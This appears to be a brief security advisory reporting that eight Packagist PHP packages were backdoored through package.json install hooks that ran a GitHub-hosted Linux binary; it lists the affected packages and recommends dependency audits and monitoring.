Packagist Supply Chain Attack Infects 8 PHP Packages Using GitHub-Hosted Linux Malware
Eight Packagist PHP packages were backdoored to execute GitHub-hosted Linux malware via package.json hooks — a stealthy new supply chain attack vector developers must audit for now.
What’s new: A supply chain attack has compromised eight packages on Packagist, introducing malicious code that executes a Linux binary downloaded from a GitHub-hosted URL. The malicious code was inserted into package.json instead of the expected composer.json, targeting JavaScript build tooling alongside PHP code — a cunning evasion technique. All affected packages have now been removed from Packagist.
Who’s affected
The following eight packages were compromised:
- moritz-sauer-13/silverstripe-cms-theme (dev-master)
- crosiersource/crosierlib-base (dev-master)
- devdojo/wave (dev-main)
- devdojo/genesis (dev-main)
- katanaui/katana (dev-main)
- elitedevsquad/sidecar-laravel (3.x-dev)
- r2luna/brain (dev-main)
- baskarcm/tzi-chat-ui (dev-main)
What to do
- Audit your project dependencies immediately for any use of the affected packages listed above.
- Expand your security scans to include checks for
package.jsonlifecycle hooks, not just PHP-native files. - Implement runtime monitoring for unauthorized scripts or binaries executed during installation or build processes.
